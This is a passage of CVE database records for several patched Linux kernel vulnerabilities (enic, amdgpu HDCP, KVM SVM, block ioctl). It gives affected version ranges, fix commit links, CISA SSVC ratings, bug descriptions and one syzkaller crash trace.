                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-21T13:26:27.611937Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-21T13:26:37.555Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:21:55.964Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2b649d7e0cb42a660f0260ef25fd55fdc9c6c600"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ca63fb7af9d3e531aa25f7ae187bfc6c7166ec2d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3c0d36972edbe56fcf98899622d9b90ac9965227"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/25571a12fbc8a1283bd8380d461267956fd426f7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7077c22f84f41974a711604a42fd0e0684232ee5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f6638e955ca00c489894789492776842e102af9c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/aee1955a1509a921c05c70dad5d6fc8563dfcb31"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e8021b94b0412c37bcc79027c2e382086b6ce449"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/cisco/enic/enic_main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "2b649d7e0cb42a660f0260ef25fd55fdc9c6c600",
              "status": "affected",
              "version": "f8bd909183acffad68780b10c1cdf36161cfd5d1",
              "versionType": "git"
            },
            {
              "lessThan": "ca63fb7af9d3e531aa25f7ae187bfc6c7166ec2d",
              "status": "affected",
              "version": "f8bd909183acffad68780b10c1cdf36161cfd5d1",
              "versionType": "git"
            },
            {
              "lessThan": "3c0d36972edbe56fcf98899622d9b90ac9965227",
              "status": "affected",
              "version": "f8bd909183acffad68780b10c1cdf36161cfd5d1",
              "versionType": "git"
            },
            {
              "lessThan": "25571a12fbc8a1283bd8380d461267956fd426f7",
              "status": "affected",
              "version": "f8bd909183acffad68780b10c1cdf36161cfd5d1",
              "versionType": "git"
            },
            {
              "lessThan": "7077c22f84f41974a711604a42fd0e0684232ee5",
              "status": "affected",
              "version": "f8bd909183acffad68780b10c1cdf36161cfd5d1",
              "versionType": "git"
            },
            {
              "lessThan": "f6638e955ca00c489894789492776842e102af9c",
              "status": "affected",
              "version": "f8bd909183acffad68780b10c1cdf36161cfd5d1",
              "versionType": "git"
            },
            {
              "lessThan": "aee1955a1509a921c05c70dad5d6fc8563dfcb31",
              "status": "affected",
              "version": "f8bd909183acffad68780b10c1cdf36161cfd5d1",
              "versionType": "git"
            },
            {
              "lessThan": "e8021b94b0412c37bcc79027c2e382086b6ce449",
              "status": "affected",
              "version": "f8bd909183acffad68780b10c1cdf36161cfd5d1",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/cisco/enic/enic_main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.35"
            },
            {
              "lessThan": "2.6.35",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.316",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.278",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.219",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.161",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.4",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.316",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.278",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.219",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.161",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.4",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nenic: Validate length of nl attributes in enic_set_vf_port\n\nenic_set_vf_port assumes that the nl attribute IFLA_PORT_PROFILE\nis of length PORT_PROFILE_MAX and that the nl attributes\nIFLA_PORT_INSTANCE_UUID, IFLA_PORT_HOST_UUID are of length PORT_UUID_MAX.\nThese attributes are validated (in the function do_setlink in rtnetlink.c)\nusing the nla_policy ifla_port_policy. The policy defines IFLA_PORT_PROFILE\nas NLA_STRING, IFLA_PORT_INSTANCE_UUID as NLA_BINARY and\nIFLA_PORT_HOST_UUID as NLA_STRING. That means that the length validation\nusing the policy is for the max size of the attributes and not on exact\nsize so the length of these attributes might be less than the sizes that\nenic_set_vf_port expects. This might cause an out of bands\nread access in the memcpys of the data of these\nattributes in enic_set_vf_port."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:15:56.715Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/2b649d7e0cb42a660f0260ef25fd55fdc9c6c600"
        },
        {
          "url": "https://git.kernel.org/stable/c/ca63fb7af9d3e531aa25f7ae187bfc6c7166ec2d"
        },
        {
          "url": "https://git.kernel.org/stable/c/3c0d36972edbe56fcf98899622d9b90ac9965227"
        },
        {
          "url": "https://git.kernel.org/stable/c/25571a12fbc8a1283bd8380d461267956fd426f7"
        },
        {
          "url": "https://git.kernel.org/stable/c/7077c22f84f41974a711604a42fd0e0684232ee5"
        },
        {
          "url": "https://git.kernel.org/stable/c/f6638e955ca00c489894789492776842e102af9c"
        },
        {
          "url": "https://git.kernel.org/stable/c/aee1955a1509a921c05c70dad5d6fc8563dfcb31"
        },
        {
          "url": "https://git.kernel.org/stable/c/e8021b94b0412c37bcc79027c2e382086b6ce449"
        }
      ],
      "title": "enic: Validate length of nl attributes in enic_set_vf_port",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-38659",
    "datePublished": "2024-06-21T10:28:15.337Z",
    "dateReserved": "2024-06-21T10:12:11.472Z",
    "dateUpdated": "2025-11-04T17:21:55.964Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42121 (GCVE-0-2024-42121)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:46 – Updated: 2025-11-03 22:01

Title

drm/amd/display: Check index msg_id before read or write

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Check index msg_id before read or write [WHAT] msg_id is used as an array index and it cannot be a negative value, and therefore cannot be equal to MOD_HDCP_MESSAGE_ID_INVALID (-1). [HOW] Check whether msg_id is valid before reading and setting. This fixes 4 OVERRUN issues reported by Coverity.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/b5b8837d066cc182f…
	https://git.kernel.org/stable/c/fbb0701af9734cff1…
	https://git.kernel.org/stable/c/ae91ffbc8b8d942e3…
	https://git.kernel.org/stable/c/9933eca6ada0cd612…
	https://git.kernel.org/stable/c/a31ea49dc8064a557…
	https://git.kernel.org/stable/c/59d99deb330af206a…

Impacted products

Vendor

Product

Version

Linux

Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < b5b8837d066cc182ff69fb5629ad32ade5484567 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < fbb0701af9734cff13917a4b98b5ee9da2fde48d (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < ae91ffbc8b8d942e3e7f188728cad557b7ed5ee4 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 9933eca6ada0cd612e19522e7a319bcef464c0eb (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < a31ea49dc8064a557565725cf045944307476a6e (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 59d99deb330af206a4541db0c4da8f73880fba03 (git)

Linux

Affected: 4.15
Unaffected: 0 , < 4.15 (semver)
Unaffected: 5.10.222 , ≤ 5.10.* (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.98 , ≤ 6.1.* (semver)
Unaffected: 6.6.39 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:01:54.568Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b5b8837d066cc182ff69fb5629ad32ade5484567"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fbb0701af9734cff13917a4b98b5ee9da2fde48d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ae91ffbc8b8d942e3e7f188728cad557b7ed5ee4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9933eca6ada0cd612e19522e7a319bcef464c0eb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a31ea49dc8064a557565725cf045944307476a6e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/59d99deb330af206a4541db0c4da8f73880fba03"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42121",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:16:57.136041Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:05.184Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/display/modules/hdcp/hdcp_ddc.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "b5b8837d066cc182ff69fb5629ad32ade5484567",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "fbb0701af9734cff13917a4b98b5ee9da2fde48d",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "ae91ffbc8b8d942e3e7f188728cad557b7ed5ee4",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "9933eca6ada0cd612e19522e7a319bcef464c0eb",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "a31ea49dc8064a557565725cf045944307476a6e",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "59d99deb330af206a4541db0c4da8f73880fba03",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/display/modules/hdcp/hdcp_ddc.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.15"
            },
            {
              "lessThan": "4.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.222",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.98",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.39",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.222",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.98",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.39",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Check index msg_id before read or write\n\n[WHAT]\nmsg_id is used as an array index and it cannot be a negative value, and\ntherefore cannot be equal to MOD_HDCP_MESSAGE_ID_INVALID (-1).\n\n[HOW]\nCheck whether msg_id is valid before reading and setting.\n\nThis fixes 4 OVERRUN issues reported by Coverity."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-09-08T15:21:45.179Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/b5b8837d066cc182ff69fb5629ad32ade5484567"
        },
        {
          "url": "https://git.kernel.org/stable/c/fbb0701af9734cff13917a4b98b5ee9da2fde48d"
        },
        {
          "url": "https://git.kernel.org/stable/c/ae91ffbc8b8d942e3e7f188728cad557b7ed5ee4"
        },
        {
          "url": "https://git.kernel.org/stable/c/9933eca6ada0cd612e19522e7a319bcef464c0eb"
        },
        {
          "url": "https://git.kernel.org/stable/c/a31ea49dc8064a557565725cf045944307476a6e"
        },
        {
          "url": "https://git.kernel.org/stable/c/59d99deb330af206a4541db0c4da8f73880fba03"
        }
      ],
      "title": "drm/amd/display: Check index msg_id before read or write",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42121",
    "datePublished": "2024-07-30T07:46:13.064Z",
    "dateReserved": "2024-07-29T15:50:41.179Z",
    "dateUpdated": "2025-11-03T22:01:54.568Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-39483 (GCVE-0-2024-39483)

Vulnerability from cvelistv5 – Published: 2024-07-05 06:55 – Updated: 2025-05-04 09:16

Title

KVM: SVM: WARN on vNMI + NMI window iff NMIs are outright masked

Summary

In the Linux kernel, the following vulnerability has been resolved: KVM: SVM: WARN on vNMI + NMI window iff NMIs are outright masked When requesting an NMI window, WARN on vNMI support being enabled if and only if NMIs are actually masked, i.e. if the vCPU is already handling an NMI. KVM's ABI for NMIs that arrive simultanesouly (from KVM's point of view) is to inject one NMI and pend the other. When using vNMI, KVM pends the second NMI simply by setting V_NMI_PENDING, and lets the CPU do the rest (hardware automatically sets V_NMI_BLOCKING when an NMI is injected). However, if KVM can't immediately inject an NMI, e.g. because the vCPU is in an STI shadow or is running with GIF=0, then KVM will request an NMI window and trigger the WARN (but still function correctly). Whether or not the GIF=0 case makes sense is debatable, as the intent of KVM's behavior is to provide functionality that is as close to real hardware as possible. E.g. if two NMIs are sent in quick succession, the probability of both NMIs arriving in an STI shadow is infinitesimally low on real hardware, but significantly larger in a virtual environment, e.g. if the vCPU is preempted in the STI shadow. For GIF=0, the argument isn't as clear cut, because the window where two NMIs can collide is much larger in bare metal (though still small). That said, KVM should not have divergent behavior for the GIF=0 case based on whether or not vNMI support is enabled. And KVM has allowed simultaneous NMIs with GIF=0 for over a decade, since commit 7460fb4a3400 ("KVM: Fix simultaneous NMIs"). I.e. KVM's GIF=0 handling shouldn't be modified without a *really* good reason to do so, and if KVM's behavior were to be modified, it should be done irrespective of vNMI support.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/f79edaf7370986d73…
	https://git.kernel.org/stable/c/1d87cf2eba46deaff…
	https://git.kernel.org/stable/c/b4bd556467477420e…

Impacted products

Vendor

Product

Version

Linux

Affected: fa4c027a7956f5e07697bfcb580d25eeb8471257 , < f79edaf7370986d73d204b36c50cc563a4c0f356 (git)
Affected: fa4c027a7956f5e07697bfcb580d25eeb8471257 , < 1d87cf2eba46deaff6142366127f2323de9f84d1 (git)
Affected: fa4c027a7956f5e07697bfcb580d25eeb8471257 , < b4bd556467477420ee3a91fbcba73c579669edc6 (git)

Linux

Affected: 6.4
Unaffected: 0 , < 6.4 (semver)
Unaffected: 6.6.34 , ≤ 6.6.* (semver)
Unaffected: 6.9.5 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:26:15.663Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f79edaf7370986d73d204b36c50cc563a4c0f356"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1d87cf2eba46deaff6142366127f2323de9f84d1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b4bd556467477420ee3a91fbcba73c579669edc6"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-39483",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:07:35.709839Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:41.168Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "arch/x86/kvm/svm/svm.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "f79edaf7370986d73d204b36c50cc563a4c0f356",
              "status": "affected",
              "version": "fa4c027a7956f5e07697bfcb580d25eeb8471257",
              "versionType": "git"
            },
            {
              "lessThan": "1d87cf2eba46deaff6142366127f2323de9f84d1",
              "status": "affected",
              "version": "fa4c027a7956f5e07697bfcb580d25eeb8471257",
              "versionType": "git"
            },
            {
              "lessThan": "b4bd556467477420ee3a91fbcba73c579669edc6",
              "status": "affected",
              "version": "fa4c027a7956f5e07697bfcb580d25eeb8471257",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "arch/x86/kvm/svm/svm.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.4"
            },
            {
              "lessThan": "6.4",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.34",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.34",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.5",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: SVM: WARN on vNMI + NMI window iff NMIs are outright masked\n\nWhen requesting an NMI window, WARN on vNMI support being enabled if and\nonly if NMIs are actually masked, i.e. if the vCPU is already handling an\nNMI.  KVM\u0027s ABI for NMIs that arrive simultanesouly (from KVM\u0027s point of\nview) is to inject one NMI and pend the other.  When using vNMI, KVM pends\nthe second NMI simply by setting V_NMI_PENDING, and lets the CPU do the\nrest (hardware automatically sets V_NMI_BLOCKING when an NMI is injected).\n\nHowever, if KVM can\u0027t immediately inject an NMI, e.g. because the vCPU is\nin an STI shadow or is running with GIF=0, then KVM will request an NMI\nwindow and trigger the WARN (but still function correctly).\n\nWhether or not the GIF=0 case makes sense is debatable, as the intent of\nKVM\u0027s behavior is to provide functionality that is as close to real\nhardware as possible.  E.g. if two NMIs are sent in quick succession, the\nprobability of both NMIs arriving in an STI shadow is infinitesimally low\non real hardware, but significantly larger in a virtual environment, e.g.\nif the vCPU is preempted in the STI shadow.  For GIF=0, the argument isn\u0027t\nas clear cut, because the window where two NMIs can collide is much larger\nin bare metal (though still small).\n\nThat said, KVM should not have divergent behavior for the GIF=0 case based\non whether or not vNMI support is enabled.  And KVM has allowed\nsimultaneous NMIs with GIF=0 for over a decade, since commit 7460fb4a3400\n(\"KVM: Fix simultaneous NMIs\").  I.e. KVM\u0027s GIF=0 handling shouldn\u0027t be\nmodified without a *really* good reason to do so, and if KVM\u0027s behavior\nwere to be modified, it should be done irrespective of vNMI support."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:16:45.307Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/f79edaf7370986d73d204b36c50cc563a4c0f356"
        },
        {
          "url": "https://git.kernel.org/stable/c/1d87cf2eba46deaff6142366127f2323de9f84d1"
        },
        {
          "url": "https://git.kernel.org/stable/c/b4bd556467477420ee3a91fbcba73c579669edc6"
        }
      ],
      "title": "KVM: SVM: WARN on vNMI + NMI window iff NMIs are outright masked",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-39483",
    "datePublished": "2024-07-05T06:55:11.270Z",
    "dateReserved": "2024-06-25T14:23:23.747Z",
    "dateUpdated": "2025-05-04T09:16:45.307Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-41000 (GCVE-0-2024-41000)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:37 – Updated: 2026-01-05 10:37

Title

block/ioctl: prefer different overflow check

Summary

In the Linux kernel, the following vulnerability has been resolved: block/ioctl: prefer different overflow check Running syzkaller with the newly reintroduced signed integer overflow sanitizer shows this report: [ 62.982337] ------------[ cut here ]------------ [ 62.985692] cgroup: Invalid name [ 62.986211] UBSAN: signed-integer-overflow in ../block/ioctl.c:36:46 [ 62.989370] 9pnet_fd: p9_fd_create_tcp (7343): problem connecting socket to 127.0.0.1 [ 62.992992] 9223372036854775807 + 4095 cannot be represented in type 'long long' [ 62.997827] 9pnet_fd: p9_fd_create_tcp (7345): problem connecting socket to 127.0.0.1 [ 62.999369] random: crng reseeded on system resumption [ 63.000634] GUP no longer grows the stack in syz-executor.2 (7353): 20002000-20003000 (20001000) [ 63.000668] CPU: 0 PID: 7353 Comm: syz-executor.2 Not tainted 6.8.0-rc2-00035-gb3ef86b5a957 #1 [ 63.000677] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 [ 63.000682] Call Trace: [ 63.000686] <TASK> [ 63.000731] dump_stack_lvl+0x93/0xd0 [ 63.000919] __get_user_pages+0x903/0xd30 [ 63.001030] __gup_longterm_locked+0x153e/0x1ba0 [ 63.001041] ? _raw_read_unlock_irqrestore+0x17/0x50 [ 63.001072] ? try_get_folio+0x29c/0x2d0 [ 63.001083] internal_get_user_pages_fast+0x1119/0x1530 [ 63.001109] iov_iter_extract_pages+0x23b/0x580 [ 63.001206] bio_iov_iter_get_pages+0x4de/0x1220 [ 63.001235] iomap_dio_bio_iter+0x9b6/0x1410 [ 63.001297] __iomap_dio_rw+0xab4/0x1810 